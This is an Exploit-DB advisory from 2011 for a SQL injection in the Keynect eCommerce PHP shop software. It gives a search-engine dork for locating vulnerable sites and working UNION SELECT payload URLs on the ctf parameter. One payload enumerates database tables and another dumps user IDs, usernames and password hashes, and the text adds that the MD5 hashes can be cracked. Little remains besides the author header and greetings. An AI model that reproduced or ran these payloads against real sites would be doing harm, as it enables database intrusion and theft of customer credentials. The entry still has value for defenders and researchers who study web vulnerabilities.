Keynect eCommerce - SQL Injection

EDB-ID:

16954

CVE:

N/A




Platform:

PHP

Date:

2011-03-10


========================================================================================
| # Title    : SQL Injection Keynect Ecommerce                                         |
| # Author   : Arturo Zamora                                                           |
| # email    : Arturo_zamora_c@hotmail.com                                             |
| # DAte     : 10/03/2011                                                              |
| # Verified : yes                                                                     |
| # Risk     : High                                                                    |
| # Published:                                                                         |
| # Script   : Powered by Keynect Ecommerce SHop http://www.keynect.co.uk/             |
| # Dork     : inurl:products.php?ctf=                                                 |
| # Tested on: Windows Xp                                                              |
======================         zeux0r 2011             =================================
Exploit  :
====================== 

http://localhost.com//products.php?ctf={sqli}


====================== 
example:
======================

http://localhost.com/products.php?ctf=-1+union+select+0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43+from+information_schema.tables--


http://localhost.com/products.php?ctf=-1+union+select+0,1,2,3,4,5,6,concat%28ID,username,password%29,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+users


====================== 
Information :
====================== 

password decrypt md5
 
====================== 
 
I Love U Pumosita

================================   Mexican shotos  ========================================
Greetz : all my friend * zer0-zo0rg * Bucio * Klanx * Xoxonaizer * GothicX * Duuf * Murder etc
-------------------------------------------------------------------------------------------